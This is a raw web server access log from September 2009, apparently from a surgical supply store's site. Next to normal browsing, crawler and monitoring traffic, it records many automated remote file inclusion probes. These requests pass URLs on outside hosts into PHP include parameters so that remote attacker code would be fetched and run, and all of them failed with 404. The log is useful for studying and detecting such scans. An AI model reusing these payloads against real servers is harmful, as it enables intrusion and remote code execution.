61.100.5.136 - - [23/Sep/2009:05:18:39 -0400] "GET //ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.125.66.82 - - [23/Sep/2009:05:18:58 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.253.82.6 - - [23/Sep/2009:05:20:02 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
61.100.5.136 - - [23/Sep/2009:05:20:03 -0400] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:20:23 -0400] "GET /logs//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:20:23 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:20:23 -0400] "GET //ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:20:24 -0400] "GET //ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:20:24 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:20:24 -0400] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.253.82.6 - - [23/Sep/2009:05:20:02 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "http://www.acesurgical.com/trufix_details.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
61.100.5.136 - - [23/Sep/2009:05:20:28 -0400] "GET /logs/access_log.Q109080900%20%20//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.253.82.6 - - [23/Sep/2009:05:20:29 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:30 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:30 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:30 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:30 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:30 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
61.100.5.136 - - [23/Sep/2009:05:20:31 -0400] "GET /logs/access_log.Q109080900%20%20//ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:31 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:32 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:32 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:32 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:32 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:33 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:33 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:33 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
61.100.5.136 - - [23/Sep/2009:05:20:33 -0400] "GET /logs/access_log.Q109081800//config/dbutil.bck.php?confdir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.253.82.6 - - [23/Sep/2009:05:20:33 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:35 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:20:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
220.181.7.83 - - [23/Sep/2009:05:20:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.122.72.216 - - [23/Sep/2009:05:20:43 -0400] "GET /logs/access_log.Q109051500//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
209.59.12.99 - - [23/Sep/2009:05:21:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.253.82.6 - - [23/Sep/2009:05:22:29 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76380 "http://www.acesurgical.com/trufix_details.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:22:31 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:22:31 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:22:31 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:22:32 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:22:45 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.122.72.216 - - [23/Sep/2009:05:23:04 -0400] "GET /logs/access_log.Q109051500//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.253.82.6 - - [23/Sep/2009:05:23:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01236A491BC8D700B497051+M37+ENG HTTP/1.1" 200 46812 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
121.101.214.54 - - [23/Sep/2009:05:24:11 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:24:11 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:24:11 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:05:24:15 -0400] "GET /logs/access_log.Q109051500//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
121.101.214.54 - - [23/Sep/2009:05:24:56 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:05:25:44 -0400] "GET /logs/access_log.Q109080100//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
61.100.5.136 - - [23/Sep/2009:05:25:47 -0400] "GET //ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:47 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:47 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:55 -0400] "GET //ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:55 -0400] "GET /logs//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:55 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:55 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:25:55 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:05:26:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.72.216 - - [23/Sep/2009:05:26:54 -0400] "GET /logs/access_log.Q109080100//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:05:26:55 -0400] "GET /logs/access_log.Q109080100//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
87.104.34.140 - - [23/Sep/2009:05:27:11 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
87.104.34.140 - - [23/Sep/2009:05:27:16 -0400] "GET /logs/xmlrpc.php HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
121.78.116.209 - - [23/Sep/2009:05:27:31 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:05:27:32 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:05:27:32 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:27:35 -0400] "GET /logs/error_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.78.116.209 - - [23/Sep/2009:05:27:44 -0400] "GET /logs/access_log.Q109071300//newspublish/include.php?path%5Bdocroot%5D=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.142.250 - - [23/Sep/2009:05:28:08 -0400] "GET /logs/error_log.Q109010300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.250 - - [23/Sep/2009:05:28:10 -0400] "GET /logs/error_log.Q108031100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.155.5.84 - - [23/Sep/2009:05:28:37 -0400] "GET /logs/error_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:38 -0400] "GET //citywriter/head.php?path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:38 -0400] "GET /logs//citywriter/head.php?path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:38 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:45 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:45 -0400] "GET //citywriter/head.php?path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:45 -0400] "GET /logs//citywriter/head.php?path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:28:52 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:28:53 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:28:55 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:28:55 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:28:55 -0400] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:29:10 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:05:29:42 -0400] "GET /logs/access_log.Q109091200//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
